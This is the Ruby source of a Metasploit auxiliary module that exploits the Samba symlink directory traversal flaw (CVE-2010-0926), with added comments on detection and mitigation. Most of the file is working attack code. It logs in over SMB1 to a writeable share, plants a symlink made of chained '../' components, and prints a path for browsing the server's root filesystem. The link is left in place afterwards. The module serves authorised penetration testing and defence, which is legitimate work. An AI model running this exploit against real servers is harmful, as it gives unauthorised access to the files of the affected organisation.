GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for the Samba symlink directory traversal (CVE-2010-0926).
#
# What the code does: it opens an SMB1 session, authenticates, attaches to the
# share named by SMBSHARE and asks the server to create a symbolic link named
# SMBTARGET whose target is a run of ten "../" components.
#
# Notes for defenders and reviewers:
# * The module metadata declares IOC_IN_LOGS and ARTIFACTS_ON_DISK. The on-disk
#   artifact is the link created in the share (default name 'rootfs'); a link
#   inside a share whose target is a chain of "../" is worth alerting on.
# * The session is pinned to SMB1 (see #run), so SMB1 use against a file server
#   that otherwise speaks SMB2+ is a second signal.
# * Mitigation is a server configuration matter: see the Samba advisory listed
#   in 'References' (it concerns the `wide links` / `unix extensions` smb.conf
#   settings -- confirm the recommended values for the Samba version in use),
#   and avoid exposing writeable shares to accounts that do not need them.
class MetasploitModule < Msf::Auxiliary

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Report

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  # Registers the module metadata and its two options.
  #
  # SMBSHARE is required and has no default; SMBTARGET is required and
  # defaults to 'rootfs'.
  def initialize
    super(
      'Name' => 'Samba Symlink Directory Traversal',
      'Description' => %(
        This module exploits a directory traversal flaw in the Samba
        CIFS server. To exploit this flaw, a writeable share must be specified.
        The newly created directory will link to the root filesystem.
      ),
      'Author' => [
        'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
        'hdm' # metasploit module
      ],
      'References' => [
        ['CVE', '2010-0926'],
        ['OSVDB', '62145'],
        ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
        ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        # Both side effects matter for clean-up and for detection: the run is
        # declared to show up in logs and to leave an artifact on disk.
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
        'Reliability' => []
      }
    )

    module_options = [
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server']),
      OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
    ]
    register_options(module_options)

    # #run always connects with versions: [1], so the protocol-version option
    # is not offered to the operator.
    deregister_options('SMB::ProtocolVersion')
  end

  # Connects over SMB1, logs in, attaches to the configured share and requests
  # the symbolic link, then prints the UNC path under which the link appears.
  #
  # No exception is rescued here, so a failure in any step propagates to the
  # caller. The link is not removed afterwards.
  def run
    share = datastore['SMBSHARE']
    link_name = datastore['SMBTARGET']

    print_status('Connecting to the server...')
    connect(versions: [1])
    smb_login

    share_unc = "\\\\#{rhost}\\#{share}"

    print_status("Trying to mount writeable share '#{share}'...")
    simple.connect(share_unc)

    print_status("Trying to link '#{link_name}' to the root filesystem...")
    # Link target is ten parent-directory components, as in the original.
    simple.client.symlink(link_name, '../' * 10)

    print_status('Now access the following share to browse the root filesystem:')
    print_status("\t#{share_unc}\\#{link_name}\\")
    print_line('')
  end
end